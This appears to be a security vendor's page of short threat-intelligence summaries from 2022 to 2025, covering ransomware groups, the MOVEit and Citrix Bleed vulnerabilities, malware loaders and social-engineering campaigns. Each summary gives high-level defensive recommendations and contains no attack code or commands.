TrickBot changes game with Ukrainian infrastructure attacks
07/15/2022
This week’s spotlight focuses on the TrickBot threat group, which has shifted from financially motivated cybercrime to targeting Ukrainian critical infrastructure. Since the start of the Russia-Ukraine war, TrickBot has launched multiple campaigns against government entities and other high-value targets, using malware such as IcedID, AnchorMail, Cobalt Strike, and Meterpreter, as well as new tools like Excel-based downloaders and ISO payloads. These attacks mark a significant departure from TrickBot’s prior focus and may indicate coordination with the pro-Russian Conti ransomware group.
Why it matters:
TrickBot’s actions blur the lines between cybercrime and state-sponsored operations. The attacks on Ukrainian critical infrastructure could lead to data loss, espionage, or disruption of essential services. Even though Conti officially ceased operations in June 2022, TrickBot members may continue targeting Ukraine in the short term, potentially working with other threat actors or state entities.
Immediate Actions:
- Organizations, especially in conflict zones, should monitor for TrickBot-related malware and unusual network activity
- Implement endpoint detection and response tools to detect malware such as IcedID, Meterpreter, and Cobalt Strike
- Ensure strong email security, particularly against phishing and malicious attachments
- Verify that multi-factor authentication (MFA) is enforced and educate users on the risks of credential theft
- Maintain robust backups and incident response plans in case of destructive malware deployment
Read Full Report Here
ShinyHunters Targets Salesforce Amid Clues of Scattered Spider Collaboration
8/13/2025
After a year of inactivity, ShinyHunters has resurfaced with targeted Salesforce attacks, showing strong tactical overlap with Scattered Spider. Campaigns leverage vishing, Okta-themed phishing pages, malicious Salesforce “connected apps,” and impersonation domains (e.g., ticket-, sso-, helpdesk-themed). Domain patterns suggest financial services and technology providers are likely next targets, with U.S.-based organizations heavily impacted.
Why it matters:
Attribution is secondary — these actors are sharing tools and infrastructure. The risk lies in the tactics. These campaigns demonstrate coordinated, high-sophistication social engineering that exploits SaaS platforms and human trust rather than technical vulnerabilities alone.
Immediate Actions:
- Harden help-desk verification processes and run vishing simulations
- Restrict Salesforce API and connected app permissions
- Monitor newly registered impersonation domains
- Automate session termination, password resets, and account disablement after suspicious MFA activity
Focus defenses on detecting and disrupting phishing, credential harvesting, and SaaS abuse rather than tracking group names.
Read Full Report Here
ReliaQuest Annual Cyber-Threat Report: 2024
04/05/2024
The 2024 Annual Cyber-Threat Report highlights a rapidly evolving cyber threat landscape, with phishing, AI-driven attacks, and automation dominating observed activity in 2023. Spearphishing links and attachments accounted for over 70% of attacks, while QR code phishing and BEC scams surged sharply. Threat actors increasingly leverage AI tools like FraudGPT to create malware, launch DDoS attacks, and streamline credential theft. Billions of compromised credentials and the growth of Living off the Land techniques emphasize the ongoing risk to organizations across sectors worldwide.
Why it matters:
Attack sophistication and speed are increasing, shrinking the window for detection and response, and exposing organizations to financial loss, operational disruption, and reputational damage.
Immediate Actions:
- Train employees on phishing, quishing, and social engineering awareness
- Implement phishing-resistant MFA and strong password policies
- Monitor AI-based attack activity and suspicious automation behavior
- Regularly audit systems for exposed credentials and unusual access patterns
- Leverage AI and automation in defenses to reduce MTTR
Read Full Report Here
Q2 2023 Ransomware Report: Victim Count Hits New Heights
07/28/2023
The second quarter of 2023 saw record-breaking ransomware activity, with nearly 1,400 organizations named on data-leak sites—a 66% increase from Q1. The most impactful campaign was by the Clop ransomware group, exploiting a zero-day in MOVEit software to steal data from hundreds of companies. Other notable incidents included the Malas ransomware targeting Zimbra servers. The U.S., U.K., Germany, Canada, and France remained the most targeted countries, while professional services, manufacturing, and finance sectors were hit hardest.
Why it matters:
The surge in double-extortion campaigns and extortion-only attacks highlights the growing efficiency and impact of ransomware groups, underscoring the need for proactive defenses and visibility into sensitive data.
Immediate Actions:
- Monitor software for vulnerabilities and apply patches promptly
- Conduct post-compromise assessments if systems may be affected
- Track ransomware-related news and threat intelligence updates
- Educate employees on phishing and social engineering risks
- Review data-exfiltration and file-transfer controls
Read Full Report Here
Ransomware trend thrives as 3,800 ESXi machines attacked
02/10/2023
The new ransomware group ESXiArgs rapidly encrypted over 3,800 Linux VMware ESXi servers worldwide in just two days, demanding roughly $50,000 per victim. Exploiting a two-year-old remote code execution vulnerability (CVE-2021-21974), attackers targeted unpatched systems in Europe, North America, and Asia. ESXi servers, which host critical virtual machines and centralized data, make high-value targets for ransomware operators. This surge highlights the ongoing risk of unpatched infrastructure and the shift of ransomware focus toward Linux-based enterprise systems.
Why it matters:
Organizations face potential operational shutdowns, significant financial loss, and exposure of sensitive data if ESXi servers are compromised. The threat underscores the importance of timely patching and robust virtualization security.
Immediate Actions:
- Update all VMware ESXi systems to the latest patched versions
- Disable the Service Location Protocol (SLP) service to reduce attack surface
- Restrict ESXi hypervisor access from the public Internet
- Implement Endpoint Detection and Response (EDR) on ESXi hosts
- Use recovery scripts cautiously and verify backups are secure
Read Full Report Here
Extortion evolution: ALPHV leaks data on cloned website
01/06/2023
The ransomware group ALPHV (aka Blackcat) has advanced its extortion tactics by cloning victims’ websites to publish stolen data, often using typo-squatted domains that closely mimic the legitimate URLs. This approach exposes sensitive information on the clear web, improving accessibility and download speeds while increasing the likelihood of victims’ partners, clients, and customers encountering the data. Recent activity targeted a U.S. financial services firm, leaking passports, driver’s licenses, and tax records, showing that ALPHV continues to innovate and pressure victims more effectively than many short-lived ransomware groups.
Why it matters:
Cloned websites make sensitive data highly visible and easily shared, amplifying reputational damage and incentivizing ransom payments. Organizations face higher exposure risk without monitoring for domain impersonation and unusual data-leak activity.
Immediate Actions:
- Monitor for typo-squatted or impersonated domains resembling your brand
- Verify and secure all public-facing websites against unauthorized replication
- Maintain offline, secure backups of sensitive data
- Educate employees and clients to recognize suspicious URLs and phishing attempts
- Apply standard ransomware defenses, including network segmentation and access controls
Read Full Report Here
Sandworm adopts ransomware with murky motives
12/02/2022
Russia’s Sandworm APT group has been linked to a new wave of ransomware attacks using RansomBoggs, targeting Ukrainian organizations. The malware, written in .NET and delivered via PowerShell scripts, encrypts files using AES-256 with RSA-encrypted keys. While the ransom note promises decryption, the attacks are likely politically motivated, aimed at disrupting critical infrastructure, with potential financial gain as a secondary objective. Sandworm’s extensive history of sophisticated attacks, including NotPetya and CaddyWiper, highlights its ability to combine destructive malware with strategic targeting.
Why it matters:
Sandworm’s use of ransomware blurs the line between politically and financially motivated attacks. Organizations supporting Ukraine or operating critical infrastructure in Europe may be at heightened risk, as attacks could escalate from encryption-only campaigns to full data exfiltration or double extortion.
Immediate Actions:
- Patch Oracle Access Manager and other known exploited software, including CVE-2021-35587
- Restrict PowerShell execution to administrators and monitor for suspicious scripts
- Ensure endpoint detection and antivirus tools cover ransomware and RATs like njRat
- Back up critical data offline and regularly test restoration procedures
- Educate staff on phishing, malware delivery techniques, and recognizing unusual system activity
Read Full Report Here
Ransom Cartel and REvil: Partners in cybercrime?
10/21/2022
Security researchers have identified links between the Ransom Cartel ransomware group and the infamous REvil gang. Ransom Cartel appears to have used REvil’s original source code to build its own variant, showing overlaps in ransomware behavior, ransom notes, and configuration files. Although the groups may now operate independently, Ransom Cartel is evolving, potentially preparing its own data-leak site to enhance extortion activities.
Why it matters:
Ransom Cartel conducts double-extortion attacks, targeting organizations in education, manufacturing, utilities, and energy sectors. Initial access often comes from compromised credentials, purchased access from brokers, or exploiting Windows and Linux ESXi servers. While the group currently has a smaller footprint than REvil or LockBit, it remains motivated and capable of high-impact ransomware operations.
Immediate Actions:
- Ensure all credentials, especially for VPNs, RDP, and SSH, are secure and regularly rotated
- Patch and update critical systems, including Microsoft Windows, Linux ESXi, and other enterprise platforms
- Implement endpoint detection and response tools to detect RATs, malware, and ransomware behaviors
- Educate staff on phishing, credential theft, and safe handling of downloaded files
- Back up critical data offline and regularly test recovery procedures
Read Full Report Here
LastPass suffers source code data breach
09/02/2022
This week’s spotlight focuses on a cyber attack against LastPass, one of the world’s largest password management services. On 25 Aug 2022, threat actors accessed portions of LastPass’ source code and proprietary technical data via a compromised developer account. According to LastPass, no customer data or encrypted vaults were accessed, but the breach of source code could still expose potential vulnerabilities that might be exploited in the future.
Why it matters:
LastPass is used by over 33 million individual users and 100,000 businesses, storing sensitive passwords. A source code leak can allow attackers to identify weaknesses and craft targeted attacks. Even without direct access to passwords, attackers could leverage user information for phishing or social-engineering campaigns.
Immediate Actions:
- Change master passwords and any high-value credentials stored in LastPass
- Ensure passwords are long (16+ characters), complex, and unique for each account
- Implement two-factor authentication (2FA) wherever possible
- Monitor for phishing attempts or suspicious messages, especially targeting users of LastPass
- Security teams should assess which stored credentials are most sensitive and create contingency plans for potential leaks
Read Full Report Here
Common Malware Loaders
08/13/2024
Malware loaders accounted for nearly 40% of critical security incidents in 2024, serving as the primary entry point for ransomware, RATs, and data theft campaigns. Leading families such as SocGholish, GootLoader, and Raspberry Robin increasingly use fileless techniques, Python-based persistence, SEO poisoning, and legitimate tools to evade detection in Windows environments. Despite major law enforcement disruptions like Operation Endgame, threat actors have rapidly shifted to new loaders and subscription-based “loader-as-a-service” models. Finance, healthcare, government, and manufacturing sectors remain heavily targeted across North America and Europe.
Why it matters:
Loaders are the gateway to full-scale breaches — once established, they enable lateral movement, privilege escalation, ransomware deployment, and prolonged undetected access.
Immediate Actions:
- Restrict and closely monitor PowerShell, wscript.exe, and Python execution
- Block script execution from temporary and untrusted directories
- Alert on unusual scheduled task creation, especially recurring tasks
- Monitor DNS and outbound traffic for anomalous C2 patterns
- Deploy EDR detections for in-memory execution and process injection
Read Full Report Here
CrowdStrike Outage: Script, Phishing, and Social Engineering Attacks
07/19/2024
On July 19, 2024, a faulty update to CrowdStrike’s Falcon Sensor triggered widespread Windows BSOD outages globally. While the issue was not caused by a cyberattack, threat actors quickly exploited the disruption with fake remediation scripts, phishing domains, and social engineering campaigns. Malicious PowerShell and batch scripts—often hosted on platforms like GitHub—were used to deploy tools such as Remcos RAT and other malware. Attackers also distributed weaponized Word documents with macros and registered dozens of impersonation domains claiming to offer outage fixes.
Why it matters:
Operational outages create high-risk conditions where urgency overrides caution, increasing the likelihood of credential theft, malware infection, and unauthorized remote access.
Immediate Actions:
- Follow only official vendor remediation guidance
- Block or restrict execution of unsigned PowerShell and batch scripts
- Disable Office macros from untrusted sources
- Monitor for newly registered impersonation domains
- Reinforce phishing and vishing awareness with users
Read Full Report Here
New 2024 MOVEit Transfer Vulnerability: What We Know So Far
06/27/2024
On June 25, 2024, a high-severity vulnerability (CVE-2024-5806) was disclosed in Progress Software’s MOVEit Transfer, affecting its SFTP module. The flaw allows authentication bypass, enabling attackers to impersonate users and access, modify, or delete sensitive files. Proof-of-concept code is public, and exploitation has already been observed in the wild. Given MOVEit’s widespread use in financial services and other data-sensitive sectors, the risk of targeted data theft and extortion is elevated.
Why it matters:
Authentication bypass in managed file transfer software creates a direct path to large-scale data exfiltration, regulatory exposure, and potential ransomware or extortion campaigns.
Immediate Actions:
- Immediately patch MOVEit to the latest fixed version
- Back up systems before making remediation changes
- Restrict outbound traffic from MOVEit servers to trusted destinations
- Block public inbound RDP access to MOVEit infrastructure
- Audit user accounts and monitor for suspicious file access or authentication activity
Read Full Report Here
New Execution Technique in ClearFake Campaign
05/31/2024
We identified a new ClearFake campaign using social engineering to trick users into manually executing malicious PowerShell code. Once executed, the code clears DNS caches, displays fake prompts, downloads additional scripts, and installs the LummaC2 malware. Unlike traditional drive-by downloads, this method relies on user action, allowing attackers to bypass detection tools and evade security controls. Financial, business, and general enterprise users are at heightened risk, as compromised websites guide them through the infection process.
Why it matters:
Successful execution allows malware to bypass technical defenses, potentially leading to data theft, persistence, and unauthorized access in enterprise environments.
Immediate Actions:
- Restrict PowerShell execution to only necessary users
- Educate employees on the risks of copying and pasting code from untrusted sources
- Block known malicious domains and IP addresses
- Implement network and endpoint controls to detect suspicious script execution
- Keep websites and third-party tools patched to prevent code injection
Read Full Report Here
Living off the Land and Fileless Malware
05/21/2024
We report that fileless malware and Living off the Land (LotL) techniques remain dominant threats, accounting for 86% of critical incidents in 2023. Attackers exploit legitimate Windows binaries like rundll32, msiexec, and mshta to execute malicious code in-memory, blending with normal system activity. These stealthy tactics make detection and post-incident analysis difficult, allowing adversaries—including advanced persistent threat groups—to conduct espionage, data theft, or ransomware deployment without leaving traditional malware footprints.
Why it matters:
Fileless and LotL attacks evade signature-based defenses, increasing the risk of prolonged undetected intrusions and operational impact on critical systems.
Immediate Actions:
- Restrict and monitor PowerShell, WScript, and other scripting tools to authorized users only
- Implement application allowlisting and behavioral detection for LOLBins
- Segregate critical systems and audit Windows Registry changes
- Monitor outbound connections for suspicious activity or C2 communication
- Enable logging and transcription of script execution for forensic visibility
Read Full Report Here
New Black Basta Social Engineering Scheme
05/15/2024
A new social engineering campaign by the Black Basta ransomware group was discovered, leveraging spam emails and voice phishing (vishing) to gain initial access. Attackers overwhelm users with thousands of emails and then impersonate IT staff, convincing them to install legitimate remote access tools such as Quick Assist (Windows 11) or AnyDesk. Once access is granted, attackers execute scripts to steal credentials, establish persistence via registry Run keys, and connect to their command-and-control servers.
Why it matters:
This campaign exploits human trust and widely trusted software, making organizations highly vulnerable to credential theft, lateral movement, and potential ransomware deployment.
Immediate Actions:
- Block newly registered domains at network proxies to prevent malicious downloads
- Restrict RMM software to approved applications only using application allowlisting
- Audit current remote management tools in the environment using tools like GreyMatter Hunt
- Educate users to follow official IT support channels and verify unexpected assistance requests
- Reset credentials immediately if unauthorized remote access is suspected
Read Full Report Here
Ransomware and Cyber Extortion in Q1 2024
05/01/2024
Ransomware activity in Q1 2024 saw an 18% decline compared to Q4 2023, largely due to holiday periods and law enforcement operations against groups like ALPHV and LockBit. Despite the slowdown, Black Basta experienced a 41% increase in activity, while other major groups—including LockBit, Play, and ALPHV—remained active but at reduced levels. Notably, ALPHV conducted an exit scam after receiving a $22 million ransom from a healthcare organization, with some affiliates moving to the newly emerged RansomHub group.
Key Trends:
Ransomware continues to target US organizations, especially in manufacturing, healthcare, and professional services. Attackers rely on phishing, exposed remote services, and software vulnerabilities to gain initial access. Law enforcement operations, such as Operation Chronos against LockBit, have temporarily disrupted activity and exposed weaknesses within criminal networks. Emerging groups like RansomHub are experimenting with new affiliate payment models, while Clop is expected to return to targeting enterprise file transfer software.
Immediate Actions:
- Implement multifactor authentication (MFA) to secure user accounts and reduce credential theft risks.
- Apply the principle of least privilege to limit user access rights and minimize attack surface.
- Maintain strong “joiners, movers, leavers” (JML) processes to ensure accounts are updated or deactivated promptly.
- Use defense-in-depth strategies, layering multiple security controls to stop attacks at different stages.
- Ensure reliable, tested backups to recover data without paying ransoms.
- Monitor external-facing assets for vulnerabilities and patch known exploits quickly.
- Restrict PowerShell usage to authorized personnel to prevent abuse by attackers.
- Prioritize regular patch management for systems, software, and firmware based on risk.
Read Full Report Here
What Is Scattered Spider?
04/16/2024
Scattered Spider is a financially motivated cybercriminal group known for advanced social engineering and ransomware attacks against large U.S. organizations. They target telecommunications, technology, healthcare, entertainment, and finance sectors, exploiting help desk staff and new hires to bypass MFA and gain network access. Collaborations with ALPHV and use of BlackCat ransomware enable double-extortion campaigns that exfiltrate and encrypt sensitive data. Their tactics emphasize deception over technical exploits, making them especially effective against English-speaking victims and hybrid work environments.
Why it matters:
These campaigns demonstrate high-risk social engineering that can cause major financial losses, operational disruption, and reputational damage if not proactively mitigated.
Immediate Actions:
- Train all employees on phishing and social engineering awareness
- Enforce strong password policies and phishing-resistant MFA
- Audit and restrict remote access tools and unused ports
- Implement network segmentation and EDR monitoring
- Maintain encrypted, isolated backups of critical data
Read Full Report Here
Business Email Compromise Detection
03/12/2024
Business Email Compromise (BEC) attacks have surged 246% over the past year, targeting organizations globally through sophisticated phishing and generative AI-assisted campaigns. Attackers exploit compromised employee accounts, administrative access, and session tokens to bypass MFA and conduct fraudulent transactions or unauthorized access. Traditional static detection often fails against these evolving threats, requiring advanced correlation, session analysis, and anomaly detection to identify malicious activity in real time.
Why it matters:
BEC can result in significant financial loss, data compromise, and operational disruption, with global damages exceeding billions annually and expected to grow in 2024.
Immediate Actions:
- Secure administrative accounts and separate them from regular email use
- Implement strong MFA, preferably FIDO2 hardware-based, and enforce location-based access policies
- Monitor authentication sequences and session anomalies for suspicious activity
- Verify all financial or sensitive transactions through dual authorization and alternative channels
- Block newly registered domains to prevent phishing and BEC attempts
Read Full Report Here
LockBit Taken Down: What Comes Next?
02/20/2024
Law enforcement’s Operation Cronos has significantly disrupted the LockBit ransomware group, targeting servers, cryptocurrency wallets, and accounts globally. While LockBit has reestablished a data-leak site, the seizure of infrastructure, arrests, and recovery of decryption keys mark a major victory against one of the most active ransomware groups. Organizations impacted by recent LockBit activity may now access a free decryption tool, though the group could attempt to restore operations or affiliates may migrate to other ransomware campaigns.
Why it matters:
The operation reduces LockBit’s immediate threat, aids victim recovery, and reshapes the ransomware landscape, but ransomware activity will continue as groups adapt and evolve.
Immediate Actions:
- Ensure backups are current and verified for quick recovery
- Deploy and monitor anti-ransomware solutions and EDR tools
- Use threat intelligence to track LockBit activity and affiliate movements
- Educate employees on ransomware phishing and social engineering tactics
- Integrate cybersecurity platforms for proactive threat detection and automated response
Read Full Report Here
Ransomware and Cyber-extortion Trends in Q4 2023
02/01/2024
Q4 2023 saw an 80% increase in ransomware attacks compared to Q4 2022, driven by vulnerabilities like Citrix Bleed and the aggressive tactics of groups such as ALPHV, Play, and LockBit. Public-facing application exploits, phishing campaigns, and ransomware-as-a-service (RaaS) platforms enabled attackers to target high-value organizations across the United States, UK, and Canada. These attacks emphasized double-extortion, regulatory pressure, and lateral movement techniques.
Why it matters:
The surge in ransomware highlights the evolving threat landscape and the need for organizations to patch vulnerabilities, restrict privileged access, and educate employees on social engineering and phishing risks. Groups like LockBit are actively expanding membership and capabilities, making vigilance essential.
Immediate Actions:
- Ensure operating systems, software, and firmware are up to date
- Practice least privilege access and restrict administrative accounts
- Disable unused internet-facing services and restrict command-line/scripting access
- Secure remote-access tools and enforce application controls
- Conduct ongoing security awareness training and phishing simulations
- Monitor high-value systems for suspicious lateral movements and privilege escalations
Read Full Report Here
ALPHV Ransomware Site Outage: What’s Going On?
12/19/2023
In December 2023, ALPHV’s (aka BlackCat) data-leak site experienced intermittent outages, creating confusion among cybercriminals and threat researchers. While the FBI reportedly intervened, the ransomware group reclaimed portions of its site, signaling continued operations despite law enforcement pressure. The outages disrupted some affiliate activities and may have limited new attacks temporarily.
Why it matters:
Law enforcement actions, including potential asset recovery and decryption tools, can undermine ransomware groups’ credibility and reduce ransom payments. However, such groups often adapt quickly, with affiliates moving to other programs or launching new operations.
Immediate Actions:
- Monitor for ransomware activity targeting your organization, even if groups appear disrupted
- Maintain offline backups and ensure regular recovery drills
- Educate staff on phishing and social engineering threats
- Keep antivirus, endpoint detection, and response tools up to date
- Patch public-facing systems and review remote-access security
- Track threat intelligence feeds for updates on active ransomware campaigns
Read Full Report Here
Citrix Bleed Vulnerability: Background and Recommendations
11/09/2023
In November 2023, the Citrix Bleed vulnerability (CVE-2023-4966) was actively exploited by a LockBit affiliate to gain access to sensitive files via vulnerable Citrix NetScaler Gateway and ADC devices. Attackers exfiltrated data using rclone.exe and deployed a benign “!important_read_me!.txt” file in each directory, initiating contact for ransom negotiations without immediately encrypting files.
Why it matters:
Citrix Bleed allows attackers to retrieve session authentication tokens and hijack active user sessions. With thousands of vulnerable devices exposed and multiple threat groups exploiting this flaw, unpatched systems face high risk of compromise.
Immediate Actions:
- Update NetScaler ADC and Gateway to patched versions as recommended by CISA and Cloud Software Group
- Kill all active sessions on affected devices to prevent session hijacking
- Monitor logs (e.g., TCPCONNSTAT under SSLVPN) for anomalous activity such as concurrent sessions from different IPs
- Audit and secure remote-access tools and protocols
- Conduct security awareness training and limit privileged account use
- Apply relevant detection rules for discovery, lateral movement, exfiltration, credential access, and privilege escalation techniques
Read Full Report Here
Ransomware and Cyber-extortion Trends in Q3 2023
10/25/2023
In Q3 2023, ransomware activity remained relentless, with groups like Rhysida, Clop, and ALPHV driving high-profile campaigns. Rhysida targeted healthcare and education, disrupting 17 hospitals and 166 clinics, while Clop executed its MOVEit campaign, exfiltrating large volumes of data without deploying ransomware.
Trends:
Despite a slight drop in the number of organizations named on data-leak sites compared to Q2, ransomware activity was nearly double that of the previous year. New groups, such as LostTrust, emerged quickly, often re-extorting previously targeted organizations. The US was the most targeted country, with professional services, manufacturing, and construction sectors bearing the brunt of attacks.
Recommended Actions:
- Implement multifactor authentication (MFA) for all accounts, particularly remote and privileged users
- Use canary tokens and continuous monitoring for early threat detection
- Segment networks to limit ransomware propagation
- Maintain offline, immutable backups and secure data recovery procedures
- Regularly patch software and external-facing systems
- Restrict PowerShell use and enforce execution of signed scripts only
- Deploy endpoint detection and response (EDR) solutions and maintain comprehensive logging
- Apply a defense-in-depth strategy combining multiple security controls
Read Full Report Here
The Israel–Hamas Conflict: Implications for the Cyber Threat Landscape
10/09/2023
Following the October 7, 2023 Hamas attack on Israel, cyber threat activity is expected to increase, driven by both hacktivists and nation-state actors. Pro-Hamas hacktivist groups, such as Killnet, UserSec, and Anonymous Sudan, have pledged support for attacks against Israeli targets, primarily using distributed denial-of-service (DDoS) methods. Meanwhile, pro-Israel groups like ThreatSec have reportedly targeted Palestinian infrastructure.
Nation-State Risks:
Iranian-linked cyber groups may increase targeted operations against Israeli or Western organizations, while Russia- and China-aligned actors could exploit the situation for espionage or influence campaigns. These attacks are expected to be strategic, impacting critical infrastructure, telecommunications, and defense-related businesses.
Recommended Actions:
- Deploy anti-DDoS solutions and follow mitigation best practices to defend against hacktivist attacks
- Perform a comprehensive risk assessment of internet-facing infrastructure, patch vulnerabilities, and reduce the attack surface
- Ensure incident response teams are aware of heightened threats and update callout lists and plans accordingly
- Monitor geopolitical developments, as organizations supporting Israel may be considered secondary targets by adversaries
Read Full Report Here
Multinational Operation Disrupts QakBot Botnet
08/29/2023
On August 29, 2023, a multinational operation successfully disrupted the QakBot botnet, which had infected over 700,000 computers worldwide. QakBot, a long-standing banking trojan, enables attackers to gain network access, steal sensitive data, and deliver additional malware including ransomware. Recent associations with the Black Basta ransomware group highlight its persistent threat across multiple industries. The operation involved seizure of cryptocurrency profits and removal of malware from victim systems.
Why it matters:
This takedown reduces immediate exposure to QakBot-driven attacks, but its adaptability means organizations remain at risk from similar malware campaigns.
Immediate Actions:
-
Verify QakBot uninstaller deployment on all systems
-
Educate employees on phishing and social engineering threats
-
Restrict remote access software and review permissions
-
Monitor for unusual network traffic or unauthorized account access
-
Check compromised credentials using public breach notification tools
Read Full Report Here
Brace for Impact: Clop MOVEit Breach Continues
08/14/2023
The
Clop
ransomware group continues to exploit the MOVEit file transfer vulnerability (CVE-2023-34362), targeting organizations globally. Recently, Clop has published torrents of stolen data from eight companies, following a slow, staged release tactic. With over 260 organizations already impacted, this campaign highlights the persistent risk of ransomware leveraging widely used software for data exfiltration.
Why it matters:
The new torrent-based leaks make stolen data easier to share and download, increasing exposure and potential reputational and financial damage for affected organizations.
Immediate Actions:
-
Verify MOVEit software is fully updated or patched
-
Conduct post-compromise analysis if your data may have been exposed
-
Monitor for data leaks and suspicious activity linked to your organization
-
Educate employees on phishing and social engineering risks
-
Evaluate alternative secure file transfer solutions
Read Full Report Here
Clop Leaks: First Wave of Victims Named
06/14/2023
The
Clop
ransomware group continues its MOVEit Transfer exploitation campaign, naming over 250 organizations across the US, Europe, and Asia. Unlike traditional ransomware, Clop focuses on data extortion—stealing sensitive information without encrypting systems—and leaks it if victims fail to negotiate. By targeting vulnerable managed file transfer software, the group efficiently compromises multiple organizations simultaneously, highlighting the persistent risk of supply-chain attacks.
Why it matters:
Organizations using MOVEit Transfer are at high risk of data exposure, making timely patching, monitoring, and mitigation critical to avoid reputational and financial damage.
Immediate Actions:
-
Identify all MOVEit Transfer instances and apply the latest security patches
-
Restrict MFT access to authorized users and known IP addresses
-
Monitor for unauthorized data exfiltration or suspicious activity
-
Conduct post-compromise assessments if systems may have been exposed
-
Educate staff on phishing and extortion tactics used by ransomware groups
Read Full Report Here
MOVEit Vulnerability Update: Clop Claims Responsibility
06/07/2023
On June 5, 2023, the
Clop
ransomware group claimed responsibility for attacks exploiting a critical zero-day vulnerability in MOVEit Transfer (CVE-2023-34362). Clop began exploiting the flaw on May 27, 2023, targeting hundreds of organizations. By June 6, Clop posted on its dark-web data-leak site, demanding victims initiate ransom negotiations by June 14, 2023, or risk having stolen data publicly exposed.
Why it matters:
MOVEit Transfer is widely used in enterprise environments, and unpatched instances allow attackers to gain unauthorized access, exfiltrate sensitive data, and conduct large-scale extortion campaigns rapidly.
Immediate Actions:
-
Identify all MOVEit Transfer instances and apply patches for CVE-2023-34362
-
Assume compromise for publicly accessible versions prior to May 31, 2023
-
Review MOVEit logs (C:\Windows\System32\winevt\Logs\MOVEit.evtx) to determine exfiltrated data
-
Restrict MFT access to authorized users and known IP addresses
-
Conduct tabletop exercises for ransomware/extortion response, involving leadership and operational teams
-
Establish or maintain relationships with law enforcement (e.g., FBI) for support if needed
-
Evaluate and harden all MFT solutions and other internet-facing services, enabling logging and SIEM integration for detection
Read Full Report Here
MOVEit Transfer Zero-Day: What We Know So Far
06/01/2023
On May 31, 2023, a critical zero-day vulnerability (CVE-2023-34362) was discovered in
MOVEit Transfer
, a widely used enterprise file-transfer solution. Active exploitation of this vulnerability has been observed since at least May 27, 2023, allowing attackers to escalate privileges, access sensitive data, and potentially alter or delete database elements, depending on the backend database (MySQL, MS SQL Server, or Azure SQL).
Affected Versions:
-
MOVEit Transfer 2023.0.0
-
MOVEit Transfer 2022.1.x
-
MOVEit Transfer 2022.0.x
-
MOVEit Transfer 2021.1.x
-
MOVEit Transfer 2021.0.x
Immediate Actions:
-
Backup all MOVEit Transfer systems before patching or mitigation
-
Disable HTTP/HTTPS access to the MOVEit environment to prevent unauthorized logins
-
Review and remove any unauthorized files and user accounts, and reset credentials
-
Apply official patches from Progress Software Corporation for all affected versions
-
Monitor for unique indicators of compromise and implement detection rules to identify exploitation
-
Engage with threat-hunting or security teams to detect and remediate signs of exploitation
Why it matters:
Exploitation of this vulnerability can lead to rapid, large-scale compromise of organizations using MOVEit Transfer. Effective detection, patching, and response are essential to minimize risk, as attackers may continue exploiting this flaw while unpatched instances remain exposed to the internet.
Read Full Report Here
2023 Ransomware: Detection and Prevention
05/01/2023
Ransomware attacks surged in Q1 2023, with double-extortion campaigns increasing nearly 30%, affecting organizations globally. Key vulnerabilities, including GoAnywhere MFT (CVE-2023-0669), the VMware ESXi OpenSLP flaw abused in the ESXiArgs campaign (CVE-2021-21974), and IBM Aspera Faspex (CVE-2022-47986), have been actively exploited by threat actors targeting businesses of all sizes, from financial services to media and entertainment. The attacks demonstrate a mix of data exfiltration and encryption tactics, highlighting the sophistication and evolving methods of ransomware operators.
Why it matters:
These attacks can result in significant financial losses, operational disruption, and reputational damage, emphasizing the need for proactive cybersecurity measures.
Immediate Actions:
-
Patch critical vulnerabilities immediately, including GoAnywhere, ESXi, and IBM Aspera Faspex
-
Segment networks and monitor external-facing assets for exposure
-
Enforce least-privilege access and secure service accounts
-
Enable comprehensive endpoint detection and logging for suspicious activity
-
Use automatic updates to maintain current software and security patches
Read Full Report Here
2023 Ransomware Attacks: First-Quarter Highlights
04/20/2023
Ransomware activity surged in Q1 2023, with nearly 850 organizations named on data-leak sites—a 22% increase from the previous quarter. Notable incidents include Clop exploiting a GoAnywhere zero-day (CVE-2023-0669) to steal data from over 130 organizations without encrypting files, and LockBit remaining the most active ransomware group. The US remained the most targeted country, while industrial goods, services, and healthcare sectors saw the highest victim counts. FBI disruptions, like the Hive server seizure, highlighted law enforcement efforts but attacks continue at record pace.
Why it matters:
The rapid growth in ransomware and data-exfiltration campaigns underscores severe financial, operational, and reputational risks for businesses worldwide.
Immediate Actions:
-
Monitor data-leak sites and dark web mentions for your organization
-
Patch critical vulnerabilities in file-transfer platforms like GoAnywhere
-
Prioritize security for high-risk sectors, including healthcare and industrial services
-
Segment networks and enforce least-privilege access for sensitive accounts
-
Deploy and maintain comprehensive endpoint detection and logging
Read Full Report Here
3CX Desktop Client Trojanized for Supply-Chain Attacks
03/30/2023
On March 29, 2023, a legitimate, signed version of the 3CX Desktop Client was trojanized in a supply-chain attack, attributed to the North Korean Lazarus Group. The malware, dubbed SmoothOperator, can exfiltrate system information and browser-stored credentials via a multi-stage payload. Impacted versions include the 3CX Desktop Client on Windows and macOS, affecting potentially millions of global users. The attack highlights the growing risk of software supply-chain compromises, which can rapidly scale and disrupt operations across industries.
Why it matters:
Compromised software from trusted vendors can bypass traditional defenses, exposing organizations to data theft, operational disruption, and targeted attacks, particularly in financial services, government, and technology sectors.
Immediate Actions:
-
Uninstall the 3CX Electron Desktop Client from all Windows and Mac systems
-
Disable automatic updates for 3CX Desktop Client
-
Use the 3CX PWA client until a secure update is available
-
Conduct endpoint hunts for indicators of compromise
-
Verify suppliers and partners for 3CX usage and assess risk
Read Full Report Here
BreachForums Is Down as FBI Arrests Alleged Founder
03/20/2023
On March 15, 2023, the FBI arrested the alleged founder and administrator of BreachForums, a prominent English-language cybercriminal forum. The forum, launched in March 2022 to succeed RaidForums, provided a platform for trading stolen data, account credentials, and cybercrime discussions. Following the arrest, BreachForums went offline, and the new administrator confirmed its permanent takedown, citing potential law enforcement compromise. Users have begun migrating to other underground forums, while new English-speaking platforms are likely to emerge soon.
Why it matters:
The closure of BreachForums disrupts a major cybercriminal hub but does not eliminate the threat; data leaks and criminal activity will continue on alternative forums, posing ongoing risks to enterprises.
Immediate Actions:
-
Monitor dark web forums and data-leak sources for mentions of your organization
-
Track new English-speaking cybercriminal platforms emerging from BreachForums’ closure
-
Enhance visibility on Russian-language forums and Telegram channels used for data leaks
-
Update threat intelligence feeds and alerting for stolen credentials
-
Educate teams on ongoing risks from displaced cybercriminal activity
Read Full Report Here
Russia-Ukraine War: 3 Cyber Threat Effects, 1 Year In
02/23/2023
